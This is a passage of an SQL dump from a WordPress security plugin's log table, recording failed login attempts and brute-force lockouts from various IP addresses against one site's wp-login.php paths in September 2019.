empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYG2HkXpgmG5P@iB8kUFwAAAJQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"198.1.66.35\";s:11:\"REMOTE_PORT\";s:5:\"42360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYG2HkXpgmG5P@iB8kUFwAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064667.3854\";s:12:\"REQUEST_TIME\";s:10:\"1569064667\";}}','notice','2019-09-21 11:17:50','2019-09-21 11:17:49',17800568,19291128,'https://bintara.com.my/test/wp-login.php',1,0,'198.1.66.35'),(25541,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:17:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:17:49\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:32:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:32:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:17:50','2019-09-21 11:17:49',17885400,19291128,'https://bintara.com.my/test/wp-login.php',1,0,'198.1.66.35'),(25542,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:17:50','2019-09-21 11:17:49',18091056,19291128,'https://bintara.com.my/test/wp-login.php',1,0,'198.1.66.35'),(25543,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYG7TDrcQxTmGrCWuaK5QAAAcY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"44930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYG7TDrcQxTmGrCWuaK5QAAAcY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064687.7906\";s:12:\"REQUEST_TIME\";s:10:\"1569064687\";}}','notice','2019-09-21 11:18:11','2019-09-21 11:18:08',17796624,19287928,'https://bintara.com.my/wp/wp-login.php',1,0,'104.248.27.238'),(25544,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:18:08\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:18:08\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:33:08\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:33:08\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:18:11','2019-09-21 11:18:08',17881584,19287928,'https://bintara.com.my/wp/wp-login.php',1,0,'104.248.27.238'),(25545,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:18:11','2019-09-21 11:18:08',18087416,19287928,'https://bintara.com.my/wp/wp-login.php',1,0,'104.248.27.238'),(25546,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHR3kXpgmG5P@iB8kUYQAAAJc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.148.82.88\";s:11:\"REMOTE_PORT\";s:5:\"38410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHR3kXpgmG5P@iB8kUYQAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064783.4749\";s:12:\"REQUEST_TIME\";s:10:\"1569064783\";}}','notice','2019-09-21 11:19:48','2019-09-21 11:19:47',17799920,19289528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.148.82.88'),(25547,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:19:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:19:47\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:34:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:34:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:19:48','2019-09-21 11:19:47',17884632,19289528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.148.82.88'),(25548,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:19:48','2019-09-21 11:19:47',18090256,19289528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.148.82.88'),(25549,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHV1iJ7D9Gn7wDPh8XkQAAAMQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"51175\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHV1iJ7D9Gn7wDPh8XkQAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064794.7467\";s:12:\"REQUEST_TIME\";s:10:\"1569064794\";}}','notice','2019-09-21 11:19:59','2019-09-21 11:19:58',17798296,19288368,'https://bintara.com.my/2019/wp-login.php',1,0,'185.52.2.165'),(25550,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:19:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:19:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:34:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:34:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:19:59','2019-09-21 11:19:58',17883208,19288368,'https://bintara.com.my/2019/wp-login.php',1,0,'185.52.2.165'),(25551,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:19:59','2019-09-21 11:19:58',18089440,19288368,'https://bintara.com.my/2019/wp-login.php',1,0,'185.52.2.165'),(25552,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHenkXpgmG5P@iB8kUlgAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"47.75.128.216\";s:11:\"REMOTE_PORT\";s:5:\"45602\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHenkXpgmG5P@iB8kUlgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064826.6204\";s:12:\"REQUEST_TIME\";s:10:\"1569064826\";}}','notice','2019-09-21 11:20:28','2019-09-21 11:20:27',17798528,19287288,'https://bintara.com.my/blog/wp-login.php',1,0,'47.75.128.216'),(25553,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHs3kXpgmG5P@iB8kU6gAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"194.244.33.34\";s:11:\"REMOTE_PORT\";s:5:\"54812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHs3kXpgmG5P@iB8kU6gAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064890.7848\";s:12:\"REQUEST_TIME\";s:10:\"1569064890\";}}','notice','2019-09-21 11:21:35','2019-09-21 11:21:34',17796680,19287184,'https://bintara.com.my/blog/wp-login.php',1,0,'194.244.33.34'),(25554,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 